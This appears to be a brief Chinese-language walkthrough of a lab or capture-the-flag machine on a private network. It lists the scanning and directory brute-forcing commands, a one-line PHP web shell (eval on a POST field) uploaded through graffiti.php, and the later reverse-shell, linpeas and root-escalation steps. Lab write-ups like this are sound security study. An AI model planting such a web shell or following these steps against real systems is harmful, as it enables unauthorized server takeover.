arp-scan -l 获取目标机器的IP
nmap -sV -A IP 查看目标机器开放的端口
gobuster dir -u http://192.168.29.130 -x php,txt,jsp,asp -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 爆破目标机器的文件目录,找到可以访问的文件路径
http://192.168.29.130/graffiti.php 发现可以上传文件的页面以及接口
<?php eval($_POST['attack']);?> 通过上传文件的方式,注入该代码
然后使用 蚁剑 连接到目标服务器, 查看目标服务器的目录
传递linpeas.sh 和 反弹shell 到目标机器
执行linpeas.sh 文件,查看目标机器的漏洞
利用漏洞获取目标机器的root最高权限
本文介绍了在IT安全领域中,使用arp-scan,nmap,gobusterdir等工具进行网络扫描和端口检测,通过文件上传和漏洞利用技巧(如linpeas.sh)获取目标机器的文件目录和root权限的过程。
1111

被折叠的 条评论
为什么被折叠?



